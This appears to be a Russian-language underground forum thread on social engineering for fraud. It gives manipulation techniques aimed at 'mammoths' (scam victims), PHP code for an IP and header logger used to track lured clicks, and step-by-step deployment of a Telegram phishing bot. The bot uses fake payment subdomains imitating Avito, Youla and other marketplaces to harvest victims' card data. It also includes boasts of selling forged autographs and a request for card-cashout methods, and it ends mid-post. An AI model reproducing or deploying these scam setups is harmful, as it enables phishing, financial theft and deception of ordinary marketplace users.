Приветствую всех форумчан. Прошлая статья в данном разделе куда-то делась, возможно, это и к лучшему, ведь она была откровенно пустой, ещё и потенциально могла быть разделена на 3 части, что не есть хорошо. В общем, я проанализировал фидбек от прошлой статьи, по-этому исправляюсь и выкладываю эту статью максимально подробно, с полным раскрытием каждого кейса и другими изменениями.
Введение
В этой статье поговорим о социальной инженерии (в дальнейшем, СИ). Разберем всё самое главное, детально, с примерами, подробным разбором кейсов. Расскажу о личном опыте, постараюсь сделать эту статью максимально интересной, в "живом" стиле.
Социальная инженерия в "белых" делах, или же в обычной жизни
Давайте разберемся, что же такое СИ? Я мог бы воспользоваться определением из википедии, и ссылать всё именно на это определение, но оставлю его вам просто для ознакомления:
В контексте информационной безопасности - психологическое манипулирование людьми с целью совершения определенных действий или разглашения конфиденциальной информации.
Click to expand...
Прочитали? Молодцы, берем на вооружение. Теперь рассмотрим ещё одно определение СИ:
Социальная инженерия — совокупность приёмов, методов и технологий создания такого пространства, условий и обстоятельств, которые максимально эффективно приводят к конкретному необходимому результату, с использованием социологии и психологии
Click to expand...
Какое из этих определений ближе для вас, рассматривая вашу сферу - решать вам, но поскольку в этом подразделе мы будем рассматривать СИ в обычной жизни, на мой взгляд, уместнее второе определение т.к никакого "манипулирования с целью разглашения конфиденциальной информации" мы, как правило, не используем в "белых" делах.
Отступление про определения, могло показаться бессмысленным, но чуть позже, вы поймёте, что это было нужно для понимания мышления дилетантов в сфере СИ или обычных людей, не понимающих всей сути.
Для таких людей, свойственно ставить мошенничество и социальную инженерию на одной ступени, а иногда и вовсе прямо называть СИ откровенным мошенничеством или средством для него. К сожалению, в последние годы, эта глупая мысль становится реальностью. Но в рамках этого подраздела, спешу сообщить, что СИ с "белой" точки зрения - очень нужная в жизни штука, по-этому будем опираться на определение №2
Вам не кажется, что любое общение человека с кем-либо, направленное на получение какой-либо выгоды это и есть СИ? Вы о чём-то договариваетесь, спорите, торгуетесь, применяя навыки СИ, а чем больше они у вас развиты, тем более простыми и доступными кажутся любые ваши цели. Ведь человек, который не умеет договариваться - мало чего добьётся в жизни, и к сожалению, это действительно так.
Мы используем СИ каждый день, наращивая опыт и знания, тем самым достигая каких-либо целей и высот, от мелких к большим. По-этому заблуждения по поводу СИ и мошенничества - разбиты.
Социальная инженерия в теневых сферах деятельности
В теневых сферах дела обстоят совсем иначе, тут уже можно рассматривать сразу два определения. Из-за огромного разброса теневых сфер, СИ может применяться абсолютно по-разному, например, с безобидной целью привлечения клиента или решения ценовых вопросов. Под это подходит определение №2, так как СИ, несмотря на использование в "темных" делах, сама по себе - абсолютно белая, целью СИ в данном случае не является мошенничество, "выбивание" данных и т.д.
Но тут же и появляется "темная" сторона использования СИ. Она направлена с
целью обмануть, ввести в заблуждение, получить нужную информацию. По-этому тут
смело можно дать волю тем, кто называет социальную инженерию мошенничеством, в
данном случае это действительно так. По-этому непростительно привести в пример
определение социальной инженерии, которое в одно время успело стать мемом:
СИ - это инструмент, задействующий социологию и психологию, который мы будем применять,чтобы убедить мамонта перейти по нашей ссылке и оплатить товар.
Click to expand...
P.S.Мамонт - жертва мошенников (как правило, используется, в значении "потенциальная")
**В данном определении подчеркнута узконаправленная цель СИ в конкретных случаях, сюда можно подставить что угодно, например: "чтобы убедить мамонта скачать наш стиллер ", "чтобы убедить мамонта перевести нам деньги " и др.
Это были на мой взгляд самые яркие и распространенные примеры использования СИ в незаконных целях, по-крайней мере это останется актуальным на 2022 - 2025 уж точно.
Но так или иначе, способы и средства в "темных" и "белых" делах - одинаковые, разница только в целях. Продать товар? Или обмануть человека на покупку товара?
Практическая часть**
В практической части, мне бы хотелось затронуть именно финансовые отношения, то есть социальная инженерия, направленная на получение финансовой выгоды, ну или грубо говоря, СИ, которую использует продавец в отношении покупателя или наоборот. Для меня так будет проще, а для вас разницы нет, т.к используемые методы прямо или косвенно будут работать и на совершенно других примерах, моя задача просто показать основное, чтобы вы поняли суть, а подставлять это можно куда угодно. Начнем с общепринятого, а закончим моими личными инновационными приёмами манипуляции)
10 приёмов манипуляции
На самом деле, их 30, но большая часть, на мой взгляд, неактуальна или редка в использовании. По-этому описывать буду подробно, т.к важно качество, а не количество. Цель одна - манипуляция, получение доверия со стороны контрсубъекта. Найти все 30 приёмов манипуляции не составит труда.
1. Имитационное переспрашивание / уточнения.
Целью этого приёма является имитация заинтересованности, повышает доверие к
вам, ведь намного лучше, если вы переспрашиваете, а не глупо и тупо на всё
отвечаете "угу".
Ошибочно полагать, что соглашаясь со всем из сказанного, контрсубъект думает,
что вы всё поняли, потому так говорите. Это в корне не так, переспросить -
лучше, чем согласиться.
2. Безразличие
Суть: ваша задача показать своё безразличие в отношении контрсубъекта, или его
темы. Таким образом, он сам будет работать на вашу заинтересованность, а не вы
на его. Применять такой интересный способ нужно с умом, в нужных ситуациях. В
противном случае, этим приёмом можно всё испортить. В общем, приём "для профи"
3. Ложная слабость или уязвимость
Один из самых интересных приёмов. Заставьте контрсубъекта поверить в слабость
или уязвимость с вашей стороны, чтобы он почувствовал силу или начал
доминировать в диалоге или общении. При грамотном выстраивании пути действий
контрсубъекта, во время перебора с доминацией или уверенность, он сам придёт
по выстроенному для него пути действий.
Также используется для жалости к вам, очень упрощает процесс манипуляции, по
этой причине, девушкам по жизни доверяют больше.
4. Чувственное усыпление бдительности
Приём интересный и распространенный ИРЛ (особенно среди девушек). Суть:
проявлять чувства (любовь, уважение, почитание), с целью усыпить бдительность
контрсубъекта. Использовать нужно в меру и с умом, перебор с чувствами грозит
отторжением. По-этому лучше набрать опыт.
5. Напор, найсточивость
Данный приём отлично заходит ИРЛ, но не всем даётся. В интернете работает не
так хорошо, но всё-равно полезный приём. Суть: настаивать на своём, быть
напористым, возможно даже добавить чуточку злости и агрессии, чтобы
контрсубъект был заинтересован в том, чтобы вас "успокоить".
6. Спешка
Очень действенный приём как ИРЛ, так и в интернете. Ваша задача убедить
контрсубъекта, что ему нужно спешить. В порыве спешки, усыпляется
бдительность, пропадают мысли и здравый ум. Превратит любого человека в
бездумную сущность, которая будет впитывать абсолютно любую информацию.
7. Перебивание мысли или темы
Ещё один хороший приём, часто его использую. Если контрсубъект заходит на
"слабую" для вас тему, например, о гарантиях, которые вы ему не можете
предоставить или др. Вы можете самыми разными способами перебить его с темы.
Помню, раньше на телефонах была функция ложного звонка, под предлогом звонка
вам - можно было переходить на любые темы, сбивая его с раздумий о неудобных
для вас тем и вопросов.
8. Использование слов контрсубъекта в ваших целях
Люди свойственны принимать свои слова как правду, редко отказываться от них.
Вы можете использовать слова контрсубъекта в своих целях, интерпретируя их как
вашей душе угодно, заставляя человеку верить не вам, а самому себе.
9. Лжеавторитетность и лжегарантии.
Приём действенный по-большей части в онлайне, ещё один из используемых мной.
Ваша задача создать уверенность для контрсубъекта, подкрепленную любыми
"гарантиями" и любой "авторитетностью", накрутка отзывов - из этой же серии
10. Индивидуальный подход.
Оставил это на 10й пункт т.к это самая главная вещь в СИ, на мой взгляд. Ваша
задача убедить в том, что контрсубъект - индивидуален для вас, что он не один
из массы тех, с кем вы работаете. Именно по-этому частые применения шаблонных
текстов в СИ ведут к провалу, ваша задача строить уникальный и индивидуальный
диалог с контрсубъектом.
Мои авторские приёмы
Сейчас расскажу о моих авторских приёмах. Ранее не встречал разбора в книгах / интернете. Очень помогают мне в моей сфере. Их немного, но уверяю, что они помогут вам в СИ очень сильно. Приступим.
1. Грамотность
Грамотность языковая, грамотность в предмете обсуждения или диалога. Вы можете
менять уровень грамотность в тексте и диалоги как угодно, менять стиль. Вам
нужно казаться дилетантом-деревенщиной? Пишите безграмотно, делайте вид, что
вы абсолютно ничего не понимаете в предмете диалога. Хотите казаться
профессионалом своего дела? Используйте термины, говорите уверенно, пускай
человек ничего не поймёт, но это вселит ему ложную уверенность в том, что вы
профессионал своего дела. Благодаря взаимодействию со стилями написания и
грамотностью, вы можете имитировать разных людей, вы можете делать
реалистичные отзывы, которые заставляют человека вам доверять.
2. Вопросы с заранее нужным ответом
Вы задаёте человеку вопрос, который включает в себя лишь ограниченный список
ответов, за которые ему будет очень трудно выйти. Например, при диалоге и
доведения человека до готовности к оплате, можно задать вопрос: Куда удобнее
оплатить? Перед ним открывается узкий выбор ответов, которые вас будут
устраивать. Человеку будет очень трудно ответить: "Подождите, а как же
гарантии?" и т.д. и т.п., в противном случае вы поставите его в неприятное
положение, что тоже будет вам на руку.
3. Время разговора
Под временем я имею ввиду не продолжительность разговора или диалога, а время
суток и время, когда мы будем с ним вести разговор (извиняюсь за тавтологию).
Суть заключается в физиологии человека. Куда труднее воспринимать информацию
ночью, рано утром, или поздно вечером, чем днём. Человек в это время суток
мало восприимчив и становится очень манипулируемым, по-этому по личному опыту
составим мини-график
**12:00 - 19:00 - мозговая активность, бодрствование
19:00 - 21:00 - ухудшение осмысление информации
22:00 - 00:00 - человек активен, но почти не способен к мозговой деятельности
00:00 - 07:00 - человек полностью не способен к анализу информации
07:00 - 10:00 - возвращение в процесс
10:00 - 12:00 - почти пик мозговой активности
По-этому если появляется возможность застать контрсубъекта в нужные вам временные промежутки - обязательно пользуемся этим
Основная механика СИ**
Тут рассмотрим основные константы социальной инженерии. Рассматривать для удобства будем от лица "продавца"
В качестве тезиса, хотелось бы отметить чёткую структуру любого диалога. Она схожа с элементами композиции в литературе. По-этому для удобства восприятия будем сравнивать именно с ней. В общем виде, как-то так:
_**Приветствие (Экспозиция)
Презентация (Продолжение экспозиции)
Реклама (Кульминация)
Вилка цен (Продолжение кульминации)**_
Заключение сделки (Развязка)
Разумеется, подобная схема отражается на СИ в любом виде, просто там раскладки будут по-другому называться, но суть остаётся той же. По-этому запомним эту схему как "стадии принятия горя". Эта схема - фундаментальная. В эту схему индивидуально можно добавить ещё и эпилог (дальнейшая работа с контрсубъектом), но в основную схему я не стал это вписывать, но теперь вам известно чуть больше.
Рассмотрим каждый из этапов чуть подробнее.
1. Приветствие (Экспозиция)
Этот этап представляет из себя знакомство с вами и с вашим контрсубъектом,
вариаций данного этапа может быть бесчисленное множество, но по факту самых
распространенных - 2
Здравствуйте - Здравствуйте
Click to expand...
Здравствуйте, меня зовут N - Здравствуйте, меня зовут N
Click to expand...
Данный этап как и все другие, отыгрывается в зависимости от ситуации. Где-то первый вариант будет уместен, а где-то нет, и со вторым аналогично. Выбирать приветствие также важно в зависимости от нужной задачи. Где-то нужно показать дружеские отношения, а где-то деловые. От этого этапа зависит дальнейшее обращение вас к контрсубъекту и контрсубъекта к вам. Этот этап задаёт тон к дальнейшему диалогу. Где-то можно добавить нотку агрессии, где-то доброты и т.д, но зачастую из-за нераскрытости контрсубъекта, вы не можете определить необходимое приветствие. Тогда на помощь идёт ещё один из моих полезных приёмов:
Приветствую
Click to expand...
Это стилистически нейтральное приветствие, его можно адресовать кому угодно, и не нужно извращаться с поиском нужного приветствия. Может показаться, что это не важно, но большинство людей валятся именно на приветствии, например, когда человеку "в возрасте" говорят "привет". Ещё забыл упомянуть, что стоит быть очень аккуратным в использовании приветствий из других языков, других национальностей, по-этому не нужно разбрасываться налево и направо фразой "салам" или "шалом"
2. Презентация (продолжение экспозиции)
Я не спроста подписал, что презентация - продолжение экспозиции. Зачастую,
презентация перекликается с приветствием, а иногда даже может быть неким
симбиозом с ним, дополняя друг друга. Презентация - этап ознакомления с вашим
родом деятельности, пока без конкретики, не связанно с каким-то товаром или
услугой. Пример комбинации с приветствием:
Здравствуйте, меня зовут N и я занимаюсь P
Click to expand...
На первый взгляд, вам могло показаться, что уже началась кульминация, но нет. На данном этапе ещё не решается судьба вашего предложения, так как его тут ещё нет, это главное. В большинстве случаев, на данном этапе контрсубъекту мало оснований прекратить диалог, но и продолжить тоже. Важно организовать это красиво, но одновременно с этим понимая, что упор нужно делать дальше, не зря я назвал это экспозицией.
3. Реклама (кульминация)
На данном этапе происходит самое главное и самое быстрое развитие сюжета, на
этом этапе контрсубъекту предоставляется возможность обдумать вашу законченную
мысль. На этом этапе, вы, непосредственно, знакомите его с самим товаром /
услугой / основным вопросом / темой. Данный этап самый важный, в большинстве
случаев как и для вас, так и для контрсубъекта. Здесь не прощаются никакие
ошибки или оплошности, важно с холодной головой на плечах выложить на стол все
карты, которые касаются основного предмета вашего диалога. Обозначить плюсы и
минусы (если надо). Также тут стоит отметить, что важно именно "блюдо", на
котором вы преподносите самое главное. По-этому рассмотрим пример хорошей и
плохой рекламы, непосредственно, разобрав, почему это хорошая / плохая
реклама.
Я продаю N за P
Click to expand...
Я продаю N. N представляет из себя K, в котором стоит отметить I, за свою цену, это лучший товар на рынке в данный момент
Click to expand...
Я думаю, очевидно, где здесь плохо, а где хорошо. Если вам не очевидно, то вы зря дочитали до сюда эту статью. Суть заключается в том, что общаясь с контрсубъектом, он может быть дилетантом в данном вопросе и вполне может не знать абсолютно ничего о вашем товаре / услуге / предложении и т.д. и т.п. , общаясь без клиентских выборок и других средств, вы не можете знать, с кем ведете диалог. Если вы не разъясните дилетанту - будет не приятный результат, вероятно, вы потеряли связь с контрсубъектом. Но если вы разъясните знающему человеку, он вам не скажет "Зачем объяснять? Я и так это знал", но такими разъяснениями вы сможете захватить ещё и дилетантскую клиентуру. В общем, лучше разъяснять всем, чем никому. Объективно даёт больший профит с массовой аудитории, да и точечно тоже.
4. Вилка цен (продолжении кульминации)
Наверное, сразу после 3 пункта, напрашивается вопрос: почему вилка цен
является кульминацией, если кульминация - реклама? Суть заключается в том, что
от вашей ценовой политики контрсубъекту тоже придётся подумать, на этом этапе
всё нестабильно, он может сорваться как из-за товара / услуги / и т.д. , так и
из-за цены. На этом этапе не нужно заморачиваться над текстами, важно грамотно
установить цену, как для вас, так и для контрсубъекта. Тут нужно определиться
с форматом вашего товара / услуги / и т.д. от этого уже и зависит
ценообразование. Всего их 2:
Затратное ценообразование
При затратном методе сначала рассчитывается расходная часть – себестоимость продукции. Себестоимость фактически отражает сумму расходов, которые компания вкладывает в единицу продукта. Чтобы установить цену, к себестоимости добавляют определенный процент наценки. Это будет нормативная прибыль. При затратном подходе ценообразование исходит из расходов, к которым добавляется наценка. Мнение покупателей при формировании цены не учитывается.
Click to expand...
Ценностное ценообразование
При ценностном методе все происходит наоборот. Сначала определяется, какой должна быть цена на вещь, а потом определяется объем затрат, который позволит получить прибыль. Фактически ценообразование строится на мнении покупателей: мы спрашиваем, сколько они готовы платить за товар.
Click to expand...
Тут важно понимать, что играться с ценником на товар нужно аккуратно, и со скидками тоже. Чисто логически становится очевидно, что изменяется только ваш навар, и он не может быть равен 0. То есть, если контрсубъект просит вас сделать скидку 80% при том, что 20% оставшихся являются меньшей частью от затрат, то такое предложение, разумеется, невозможно в рамках здравого смысла. Согласится на него можно только если ваша задача - обмануть контрсубъекта на деньги)
5. Заключение сделки (развязка)
Финальный этап, на котором в большинстве случаев всё уже в ваших руках, контрсубъект уже прошёл весь путь и дошёл до финишной прямой. Этот этап означает, что используя ваши навыки СИ, вы смогли прийти к нужной и поставленной цели, вы смогли договориться об условиях, о цене, да и в целом, вы большой молодец. Здесь можно расслабиться, это самый ненапряженный момент, ваша задача обозначить условия сделки (которые в большинстве случаев обсуждались до этого этапа, потому никаких проблем возникнуть не должно). Дальше вы либо принимаете оплату (если вы продавец), либо оплачиваете (если покупатель).
**Подытожим:
Совмещая приёмы СИ, соблюдая основную механику и план построения диалога ваши
шансы на успех в любом вопросе возрастают в разы, не могу сказать, что из этой
статьи вы стали профессионалом социальной инженерии, но базу вы уже получили -
точно. Вы знаете механику, схематику, основные приёмы. Если вы обратили
внимание, то схематика универсальная и подходит в абсолютно любых случаях,
даже если речь идёт не о финансовых взаимоотношениях. Сюда можно подставлять
всё что вашей душе угодно и оно будет уместно. Но, по правилам на конкурс
статей я должен ещё предъявить кейсы с личным опытом, так что если интересно -
оставайтесь)
Практикуемся в СИ (Lite)
Схема авторская, могу сказать, что штука действенная. Ваша задача в свободное
время сидеть на разных ресурсах и набивать посещения на ваш логгер (чтобы
понимать эффективность вашей работы). Разумеется, никто просто так ссылочки
открывать не будет, в этом и заключается лайт-практика, придумывайте разные
предлоги заходить на ваш логгер, и ведите статистику. Например, из 50 человек,
на сайт перешли 20 - уже неплохо. Чем выше
число заходов тем лучше, на начальном этапе у вас будет не более 10 переходов.
Ну а теперь код на логгер, очень простой.**
Code:Copy to clipboard
<?php
$data = "\n\n";
foreach ($_SERVER as $key => $val) {
$data .= "{$key}: {$val}\n";
}
$ipadress = $_SERVER['REMOTE_ADDR'];
$datenow = date("l dS of F Y h:i:s A");
$text = "$data";
$fp = fopen("log/$ipadress || $datenow.txt", "w");
fwrite($fp, $text);
fclose($fp);
?>
Используем СИ для разностороннего мошенничества
Вооружаемся полученными знаниями и идём на зарубежные площадки. Стандартно схемы две:
1.0 - Мошенничество в отношении покупаталей
2.0 - Мошенничество в отношении продавцов
Для работы по 1.0, наша задача просто создать объявление с ходовым товаром, в котором нашими жертвами будут являться непрошаренные люди, оттренировавшись под разными предлогами кидать ссылочки, вам это пригодится в мошенничестве.
Для 2.0 ваша задача отписывать продавцам и используя полученные знания, под видом покупателя кидать ссылку на "получение средств за оплаченный покупателем товар".
Задача понятна? Молодцы. Держите мой исходник. Сейчас проинструктирую.
телеграм-бота и веб-часть на PHP ](https://github.com/TrustOwn/ScamBotTg)
Скамим ребятушек по Европе и СНГ через телеграм-бота и веб-часть на PHP - TrustOwn/ScamBotTg
github.com
Залетаем к доменному регистратору и закупаем домен формата pay.com
Затем создаём поддомены в соответствии со всеми сервисами в репо, пример:
Avito.pay.com
Youla.pay.com
Blablacar.pay.com
и так далее, всего там 30 сервисов, название архива = название сервиса
Создаём домен под бота, в целях безопасности, поддомен должен быть какой-
нибудь замудренный, например
efekfkef.pay.com
Или взять вообще отдельный домен, тут на ваше усмотрение. Заливаем и
распаковываем каждый архив в директориях домена, в соответствии с названием. В
каждой директории в файле _set.php ставим домен бота. Сравниваем номер сервиса
в каждой папочке, в _set.php и бежим в директорию домена бота в папку domains
создаём текстовичок с номером в соответствии с _set.php и в этом текстовичке
просто пишем домен сервиса, всего 30+ текстовичков, как и сервисов.
Создаём бота у @BotFather
Создаём группы, закидываем туда своего бота
В директории домена бота, в папке _config.php устанавливаем Telegram API токен
бота, ID групп, ID можно узнать через @MyIDBot, закинув его в нужную группу и
прописав /getgroupid@MyidBot , предварительно сделав из группы супергруппу
(назначить бота админом)
Затем прописать вебхук
(https://api.telegram.org/botТОКЕН/SetWebhook?url=домен/tinkoff.php).
Обязательно иметь SSL-сертификат Lets'Encrypt. Затем в директории домена бота,
в папке users у любого из юзеров со статусом 5 поменять ID на свой
Поздравляю. Вы установили своего собственного мультискам-бота в Телеграме**
Тыкаем "Создать" в кнопочках в боте, создаём объявление, он сам выдаст вам
ссылку, которую нужно будет отправлять мамонтятам на сервисах. Когда
мамонтенок будет переходить и вводить свои данные в предусмотренный фишинг, то
они будут приходить в админ-беседу
Функционал:
Отстук:
**
Такие дела
**Разбор моих кейсов и личный опыт
Для начала, моя микро-биография, разумеется в рамках, чтобы всё-таки была
анонимность.
Моя карьера в онлайне началась в 2010х, тогда я познакомился с новинкой под
названием "Сlassfields" (в Европе), у нас же это переводится как доски
объявлений. Первой из крупных была Avito. Тогда я торговал как частник разной
мелкой электроникой, в том числе и наручные часы в опт. До этого, я вёл дела в
оффлайне, с 2000х годов.
1 тонна наручных часов в одни руки**
Продажа была оптовой, я закупал часы килограммами у различных оптовых точек или частных заводов. Был феномен покупки часов не штуками, а килограммами, как в Евро-секондхендах.
2011-2012 годы, тема одновременно и новая, и старая. По сути это дело
ломбардное, но с другой стороны специализация была только на часах. Продаж не
было от слова совсем. Тогда я закупил 50 кг наручных часов, и даже тогда это
казался огромный объём. Приходило очень мало людей, и очень мало брали. Никому
не была смысла брать их килограммами, и они продавались весь год поштучно.
Декабрь 2011, середина. Заходит мужчина лет 55-60, седоватый, невзрачный,
никогда его не видел ранее, да и по нашим клиентским базам человек с такими
запросами не числился, на нём были очки, в стиле 70-х, но не суть. В общем, он
говорит: "мне нужна 1 тонна часов, если у вас их нет так и скажите - пойду
искать дальше", а у меня было всего около 45 кило часов, но были средства на
закуп одной тонны, только проблема была в том, что такой объём достать было
нереально. Это четверть газели, набитой наручными часами. В общем, мне
пришлось соврать ему, что у меня они лежат на складе в Новочеркасске (соседний
город), и что привезут через 2 дня. У меня было ровно 2 дня, чтобы достать
где-то 1 тонну наручных часов при том условии, что в Ростове-на-Дону, это было
сделать нереально. Я нашёл продавца на авито, но он находился в Москве. Я
пошёл на трассу, где была стоянка дальнобоев, моя задача была найти того, кто
на трассе М4-Дон едет в Москву и точно знает, что оттуда поедет хотя бы на
четверть пустой. Из 7 грузовиков, оказался только один дальнобой, который едет
по маршруту Ростов-Москва, на выгрузку и Москва-Ростов с 15т отходами
подсолнечника. Долгие споры по сумме и по формату нашей сделки, долго мы не
могли договориться, его смущала такая спешка. В общем, мне удалось уговорить
его и мы вышли на общую цену.
Я накинул ему 50 000 RUB за то, чтобы он забрал с Московской объездной ящики с
1 тонной наручных часов, и пригнал их на склад в Ростов. Отложив срок с
мужчиной по часам на доп. 2 дня, часы доходят до меня, и мне удается их
продать за двойную цену. В общем мораль сей басни такова: если есть
возможность заработать - не пропускайте её, если есть возможность договориться
**Микро-разбор: тут мы видим спонтанную ситуацию, чистой воды импровизация. Мы убедили контрсубъекта в том, что мы имеем нужный товар, в нужном объёме, мы использовали его фразу "если есть - или пойду к другому" в своих целях, приняв правила его "игры", тем самым потенциально поставив его в неловкое положение в случае отказа забирать данный объём, теперь разберем дальнобойщика, тут всё прошло 1 в 1 по схеме выше, мы срочностью убеждаем его согласиться на данные условия, используя приём №3 входим в доверие, получаем добро, обсуждаем цену, сторговываемся в нашу пользу, получаем профит.
Продажа 20 штук автографов группы "Кино" из под принтера**
Один мой приятель, был заядлым фанатом группы "Кино" и одновременно большим
денежным мешком без здравого мышления. В общем, ему капнула приличная сумма
денег, и он смело пошёл и купил на неё у какого-то наркомана 10 штук
автографов группы "Кино", и поспешил известить об этом меня. Я удивился, так
как сам был любителем группы "Кино", а точнее именно Виктора Цоя, но тоже не
суть. В общем, я выкупил один экземпляр для себя, и совершенно случайно
обнаружил, что это печатка из под принтера, которую состарили под солнцем, ко
мне в гости пришёл другой мой знакомый, на тот момент - "эксперт по
документам", ну думаю, вы поняли, чем он занимался.
В общем, фальсифицировал всё что мог, и в один момент, он приходит ко мне в
гости и видит в рамке автограф группы "Кино", бумага желтая, чутка порванная,
у меня не было сомнений, что это оригинал. Он подходит ко мне и говорит: "Это
фальшивка! Смотри:", он ведет меня в фото-ателье и делает копию на атласной
бумаге, после чего кладёт её во дворе на солнце между двумя камнями и
оставляет на 3-4 дня, а когда я пришёл её забирать, то был шокирован: бумага
обрела такое же качество как мой "автограф", тогда нам с ним пришла идея
продать 20 штук таких автографов, их купил один бизнесмен из Таганрога за
очень неплохие на тот момент деньги, но чтобы продать, мне пришлось
притвориться пьяницей, который даже мать свою пропьёт.
По итогу, этот "бизнесмен" понял своё преимущество и положение и предложил
достаточно низкую цену для оригинала, но мы понимали, что этот дурак - один из
немногих, кто поведется на такое, пришлось продать дешевле, но для копий из
принтера всё равно очень неплохо. К слову, это было использование приёма №3
социальной инженерии (один из моих любимых, повторюсь)
Микро-разбор: контрсубъект тут всего один, тем не менее и тут есть что разбирать. Приёмов было использовано 2, срочность и ложная слабость и спешка, да ещё и дело было вечером, ещё и бонусом он пьяный пришёл, вообще нужный нам клиент, получается. Отработано чётко в нужное время суток, повезло с состоянием контрсубъекта, так и ещё и в доминирующее положение он вошёл, всё как полагается. Сам себе ставлю 10/10. Великолепная работа.
**Теперь о моём текущем деле, сейчас у меня сеть антикварных магазинов по Ростову и области, есть магазинчики на авито, сайт, но если я пишу эту тему на этом форуме, значит я вам рассказал не всё
В общем, поддержите тему, если она вам понравилась, я на этом форуме новичок. Решил принять участие в конкурсе) Почти 3 дня потратил на статью)**
Приветствую обитателей Форума!
1. Попросите об одолжении
Мы говорим об эффекте, известном как эффект Бенджамина Франклина. Однажды
Франклину понадобилось завоевать расположение человека, который его очень не
любил. Тогда Франклин вежливо попросил этого человека одолжить ему редкую
книгу и, получив желаемое, ещё более вежливо поблагодарил его. Раньше этот
человек избегал даже говорить с ним, но после этого случая они стали друзьями.
Эта история повторяется раз за разом. Суть в том, что тот, кто однажды сделал вам одолжение, более охотно сделает это ещё раз по сравнению с тем человеком, который чем-то обязан вам. Объяснение простое — человек решает, что раз вы что-то у него просите, то и сами в случае нужды откликнитесь на его просьбу, так что он должен делать так же, как вы.
2. Требуйте большего
Эту технику называют «дверью в лоб». Нужно попросить человека сделать больше,
чем вы в действительности хотите от него получить. Можно также попросить
сделать нечто нелепое. Скорее всего, он откажется. Вскоре после этого смело
просите то, что хотели с самого начала — человек почувствует себя неуютно из-
за того, что отказал вам в первый раз, и, если вы теперь попросите нечто
разумное, будет чувствовать себя обязанным помочь.
3. Называйте человека по имени
Известный американский психолог Дейл Карнеги считает, что называть человека по
имени невероятно важно. Собственное имя для любого человека — это самое
приятно сочетание звуков. Оно — существенная часть жизни, поэтому его
произнесение как бы подтверждает для человека факт собственного существования.
А это, в свою очередь, заставляет испытывать положительные эмоции по отношению
к тому, кто имя произносит.
Точно так же влияет использование титула, социального статуса или сама форма обращения. Если вы ведёте себя определённым образом, то к вам будут относиться именно так. Например, если вы называете человека своим другом, он вскоре почувствует дружеские чувства по отношению к вам. А если хотите на кого-то работать, называйте его боссом.
4. Льстите
На первый взгляд тактика очевидна, но есть некоторые оговорки. Если ваша лесть
не выглядит искренней, она принесёт больше вреда, чем пользы. Исследователи
обнаружили, что люди склонны искать когнитивный баланс, стараясь, чтобы их
мысли и чувства всегда совпадали. Так что, если вы льстите людям с высокой
самооценкой, и лесть звучит искренне, вы им понравитесь, потому что
подтвердите их собственные мысли. А вот лесть по отношению к людям с низкой
самооценкой может привести к негативным чувствам, потому что ваши слова
противоречат их мнению о себе. Конечно же, это не означает, что таких людей
надо унижать — так вы их симпатию точно не завоюете.
5. Отражайте
Отражение также известно как мимикрия. Многие люди используют этот метод
естественным образом, даже не задумываясь о том, что делают: автоматически
копируют чужое поведение, манеру речи и даже жесты. Но эта техника может
использоваться совершенно сознательно.
Люди склонны относиться лучше к тем, кто на них похож. Не менее любопытен
факт, что если при недавнем разговоре кто-то «отражал» поведение человека, то
этому человеку будет в течение некоторого времени приятнее общаться и с
другими людьми, даже если они никакого отношения к тому разговору не имели.
Причина, скорее всего, такая же, как в случае с обращением по имени —
поведение собеседника подтверждает сам факт существования личности.
6. Пользуйтесь усталостью оппонента.
Когда человек устаёт, он становится более восприимчивым к чужим словам, будь
то просьба или заявление. Причина в том, что усталость влияет не только на
тело, но и снижает уровень психической энергии. Когда вы просите об одолжении
уставшего человека, вероятно, вы получите ответ вроде «Хорошо, сделаю это
завтра» — потому что на данный момент человек никаких проблем больше решать не
хочет. А вот на следующий день человек, вероятнее всего, выполнит обещанное —
люди, как правило, стараются держать своё слово, потому что иначе получают
психологический дискомфорт.
7. Предложите то, от чего будет неудобно отказаться
Это техника, обратная пункту номер два. Вместо того, чтобы сразу обратиться с
большой просьбой, попробуйте начать с малого. Если человек помог вам с чем-то
незначительным, он более охотно выполнит и просьбу поважнее.
Учёные проверили этот способ в отношении маркетинга. Они начали агитировать
людей выразить поддержку относительно окружающей среды и сохранения
тропических лесов. Довольно лёгкая просьба, не так ли? Когда люди выполнили
требуемое, их попросили купить продукты — все вырученные средства будут
направлены на сохранение этих самых лесов, разумеется. Большинство людей
сделали и это.
Однако будьте внимательны: не стоит сначала просить одно, а потом сразу
совершенно другое. Гораздо эффективнее выждать день или два.
8. Умейте слушать
Говорить кому то, что он не прав — не самый лучший способ расположить к себе
человека. Эффект, скорее всего, будет обратным. Существует другой способ
выразить несогласие и не нажить при этом врага. Например, послушайте, что
говорит ваш собеседник, и постарайтесь понять, что он при этом чувствует и
почему. Тогда вы найдёте нечто общее в ваших, казалось бы, противоположных
мнениях и можете использовать это для объяснения своей позиции. Выразите
сначала согласие — так человек более внимательно отнесётся к вашим последующим
словам.
9. Повторяйте за собеседником
Один из самых эффективных способов расположить к себе человека и показать, что
вы его действительно понимаете — это перефразировать то, что он говорит.
Скажите то же самое, только своими словами. Это техника ещё известна как
рефлективное слушание. Так часто поступают психотерапевты — люди рассказывают
им больше о себе, и между врачом и пациентом выстраиваются почти дружеские
отношения.
Такую технику легко использовать при разговоре с друзьями. Сформулируйте
только что сказанную ими фразу как вопрос — так вы покажете, что внимательно
слушали и поняли человека, и ему будет с вами комфортнее. Он также будет
больше прислушиваться к вашему мнению, потому что вы уже ясно дали понять, что
он вам небезразличен.
10. Кивайте
Когда люди кивают, слушая что то, то это как правило означает, что они с
согласны с говорящим. И для человека естественно предположить, что когда кто-
то кивает при разговоре с ним, то это тоже означает согласие. Это тот же самый
эффект мимикрии. Так что кивайте на протяжении всей беседы с человеком —
впоследствии это поможет вам убедить собеседника в вашей правоте.
Быть Добру!
Всем привет, готов приобрести информацию по поводу работы с матом цц + 3дс. Суть вытащить с карты в 0.
Главное чтобы обнал происходил онлайн, без пос и дропов.
За любые полезные советы так же готов отблагодарить $$.
Досье
_Сложность реализации:легкая
Потенциальная прибыль: десятки тысяч долларов
Необходимые знания: минимальные, понимание HTML+CSS
Необходимые вложения: около пары сотен долларов
Необходимые навыки:
- терпеливость : легкий
- усидчивость : легкий
- удача : средний_
-интуиция : средний
Тема публицируется по причине того, что стало скучно!
Все, кто по ней работали - перестали выходить в онлайн, поудаляли аккаунты,
и есть у меня небеспочвенное подозрение, что сделали бюджеты и теперь сидят
в оффе занимаются прочими делами.
Весомый вопрос - че ж я сам тогда такие же бюджеты не сделал? А все просто.
Заработать много денег можно много как, распыляться на все темы - меня
